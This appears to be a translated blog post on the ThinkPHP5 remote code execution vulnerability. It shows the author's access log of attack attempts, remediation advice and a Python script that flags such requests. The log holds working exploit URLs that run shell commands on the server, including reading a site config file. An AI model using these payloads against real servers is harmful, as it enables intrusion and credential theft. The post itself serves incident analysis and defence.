172.68.253.110 - - [12/Dec/2018:19:21:30 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 -
172.68.253.110 - - [12/Dec/2018:19:21:40 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.110 - - [12/Dec/2018:19:22:07 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 -
172.68.253.110 - - [12/Dec/2018:19:22:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.211.211 - - [12/Dec/2018:19:24:15 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
172.68.211.211 - - [12/Dec/2018:19:24:28 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
162.158.179.19 - - [12/Dec/2018:19:24:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/worldnow.tar.gz%20/home/website/worldnow/upload HTTP/1.1" 404 42952
162.158.179.19 - - [12/Dec/2018:19:25:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42768
162.158.179.19 - - [12/Dec/2018:19:25:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43054
172.68.211.211 - - [12/Dec/2018:19:25:18 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
172.68.211.211 - - [12/Dec/2018:19:25:57 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43043
172.68.211.211 - - [12/Dec/2018:19:26:09 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43042
162.158.179.19 - - [12/Dec/2018:19:26:26 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 404 43202
172.68.253.158 - - [12/Dec/2018:19:27:10 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 404 43211
172.68.253.158 - - [12/Dec/2018:19:28:20 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 404 43211
162.158.179.175 - - [12/Dec/2018:19:30:33 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com HTTP/1.1" 404 42857
173.245.48.84 - - [12/Dec/2018:19:32:15 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 404 43041
162.158.179.175 - - [12/Dec/2018:19:32:21 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 404 42914
172.68.142.86 - - [12/Dec/2018:20:06:03 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config HTTP/1.1" 404 42872
108.162.226.176 - - [12/Dec/2018:20:11:51 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 404 42941
172.68.211.211 - - [12/Dec/2018:20:17:09 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=system&vars[1][]=ls HTTP/1.1" 404 42483
172.68.255.5 - - [13/Dec/2018:09:52:03 +0800] "GET /trade//index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 404 42780
108.162.215.85 - - [13/Dec/2018:11:18:59 +0800] "GET /trade/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42766
108.162.215.85 - - [13/Dec/2018:11:19:13 +0800] "GET /trade/index.php?s=../index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42645
108.162.215.85 - - [13/Dec/2018:11:19:20 +0800] "GET /trade/index.php?s=/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 42636
108.162.215.85 - - [13/Dec/2018:11:20:14 +0800] "GET /world/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43040
108.162.215.85 - - [13/Dec/2018:11:21:15 +0800] "GET /world/index.php?s=index/thinkphp\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43058
108.162.215.85 - - [13/Dec/2018:11:21:45 +0800] "GET /world/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 43039
108.162.215.85 - - [13/Dec/2018:11:22:34 +0800] "GET /traden//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 7355
108.162.215.85 - - [13/Dec/2018:11:22:46 +0800] "GET /traden//index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:22:59 +0800] "GET /traden/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:23:30 +0800] "GET /traden/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:23:39 +0800] "GET /traden/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 7355
172.68.47.45 - - [13/Dec/2018:11:23:50 +0800] "GET /block//index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 214
172.68.47.45 - - [13/Dec/2018:11:24:31 +0800] "GET /world/age/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44896
172.69.33.134 - - [13/Dec/2018:11:25:24 +0800] "GET /en/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 210
172.69.33.134 - - [13/Dec/2018:11:25:29 +0800] "GET /index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 207
172.69.33.134 - - [13/Dec/2018:11:27:28 +0800] "GET /world/age/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44897
172.69.33.134 - - [13/Dec/2018:11:27:34 +0800] "GET /world/age/index.php?s=age/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44884
172.69.33.134 - - [13/Dec/2018:11:27:45 +0800] "GET /world/age/index.php?s=age/view/blue//think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44813
172.69.33.134 - - [13/Dec/2018:11:27:50 +0800] "GET /world/age/index.php?s=age/view/blue//invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44773
172.69.33.134 - - [13/Dec/2018:11:27:53 +0800] "GET /world/age/index.php?s=/view/blue//invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44666
172.69.33.134 - - [13/Dec/2018:11:27:58 +0800] "GET /world/age/index.php?s=/view/blue/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44683
172.69.33.134 - - [13/Dec/2018:11:28:18 +0800] "GET /world/age/index.php?s=/app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 404 44677
172.68.211.211 - - [13/Dec/2018:11:35:23 +0800] "HEAD /world/function.asp HTTP/1.1" 404 -
173.245.48.60 - - [13/Dec/2018:11:35:23 +0800] "HEAD /world/function.aspx HTTP/1.1" 404 -
162.158.58.210 - - [13/Dec/2018:11:35:23 +0800] "HEAD /world/function.php HTTP/1.1" 404 -
108.162.215.235 - - [13/Dec/2018:11:43:03 +0800] "HEAD /world/includes/functions.php HTTP/1.1" 404 -
162.158.59.67 - - [13/Dec/2018:11:48:20 +0800] "HEAD /world/function/uploadproductpic.asp HTTP/1.1" 404 -
162.158.59.67 - - [13/Dec/2018:11:48:21 +0800] "HEAD /world/system/function/uploadproductpic.asp HTTP/1.1" 404 -
173.245.48.234 - - [13/Dec/2018:11:48:29 +0800] "HEAD /world/functions.asp HTTP/1.1" 404 -
108.162.215.85 - - [13/Dec/2018:11:49:05 +0800] "HEAD /world/includes/functions.asp HTTP/1.1" 404 -
173.245.48.234 - - [13/Dec/2018:11:49:49 +0800] "HEAD /world/function/uploadproductpic.aspx HTTP/1.1" 404 -
173.245.48.234 - - [13/Dec/2018:11:49:51 +0800] "HEAD /world/system/function/uploadproductpic.aspx HTTP/1.1" 404 -
108.162.215.85 - - [13/Dec/2018:11:50:29 +0800] "HEAD /world/functions.aspx HTTP/1.1" 404 -
173.245.48.84 - - [13/Dec/2018:11:50:31 +0800] "HEAD /world/includes/functions.aspx HTTP/1.1" 404 -
162.158.58.54 - - [13/Dec/2018:12:09:23 +0800] "HEAD /world/system/function/uploadproductpic.php HTTP/1.1" 404 -
162.158.58.54 - - [13/Dec/2018:12:09:23 +0800] "HEAD /world/function/uploadproductpic.php HTTP/1.1" 404 -
162.158.58.54 - - [13/Dec/2018:12:14:51 +0800] "HEAD /world/functions.php HTTP/1.1" 404 -
162.158.58.210 - - [13/Dec/2018:12:25:52 +0800] "HEAD /world/function/ HTTP/1.1" 404 -
162.158.58.210 - - [13/Dec/2018:12:26:34 +0800] "HEAD /world/include/function.asp HTTP/1.1" 404 -


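It scared me into adding a regex right away. Once it was in place, this damn thing could no longer be executed. Looks like it's time to study tracing attackers with Wireshark.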



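Remediation recommendations

1. The official site has released a security update, available at http://www.thinkphp.cn/topic/60400.html.

2. Users of the content management systems listed above that are built on ThinkPHP5 should check promptly whether they are affected by this vulnerability.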
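As an added example (not code from the original post or from ThinkPHP), the following script checks access logs like the excerpt above for requests whose `s=` route puts a namespace-style string in the controller position, and records which callable and argument each request tried to pass. The sample lines, the function names and the safe-controller pattern are assumptions made for this illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs

# Constructed sample lines in the same access-log format as the excerpt above
# (documentation-range IPs and placeholder paths, not taken from the post).
SAMPLE_LOG = r'''
192.0.2.10 - - [12/Dec/2018:19:32:21 +0800] "GET /shop/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 404 42914
192.0.2.10 - - [12/Dec/2018:19:33:02 +0800] "GET /shop/index.php?s=index/\\think\\Request/input&filter=phpinfo&data=1 HTTP/1.1" 200 275
198.51.100.7 - - [12/Dec/2018:19:40:11 +0800] "GET /shop/index.php?s=index/goods/detail&id=42 HTTP/1.1" 200 5120
198.51.100.7 - - [12/Dec/2018:19:41:00 +0800] "HEAD /shop/functions.php HTTP/1.1" 404 -
'''

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Assumption: a legitimate controller name holds only letters, digits, "_" and ".".
SAFE_CONTROLLER = re.compile(r'^[A-Za-z][\w.]*$', re.ASCII)

def first(params, *names):
    """Return the first value found under any of the given parameter names."""
    for name in names:
        if params.get(name):
            return params[name][0]
    return None

def inspect_target(target):
    """Return details if the s= route (module/controller/action) has an unsafe controller."""
    query = target.partition('?')[2].replace('\\\\', '\\')  # undo "\\" log escaping
    params = parse_qs(query)  # also percent-decodes the values
    segments = [p for p in (first(params, 's') or '').split('/') if p]
    if len(segments) < 2 or SAFE_CONTROLLER.match(segments[1]):
        return None
    return {'controller': segments[1],
            'callable': first(params, 'vars[0]', 'filter'),
            'argument': first(params, 'vars[1][]', 'data')}

def scan(log_text):
    """Group flagged requests by the client address in the first log field."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        finding = inspect_target(m.group(3)) if m else None
        if finding:
            finding.update(time=m.group(2), status=int(m.group(4)))
            hits[m.group(1)].append(finding)
    return dict(hits)
```

Grouping by the first log field is only meaningful when that field holds the real client address; behind a reverse proxy or CDN, log the forwarded client IP as well. Review every hit together with file-system and process evidence rather than relying on the response status.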

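Unless otherwise noted, all articles on this blog are original. Author: odaycaogen. When copying or reposting, please credit 123``blog with a hyperlink.
Original article: "[Vulnerability Alert] ThinkPHP5 Remote Code Execution Vulnerability"

Solemn declaration: this article is for technical exchange and learning only. Please respect local laws and regulations, and do not damage the websites or apps of companies or individuals. The author of 123``blog accepts no responsibility for any resulting legal liability.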
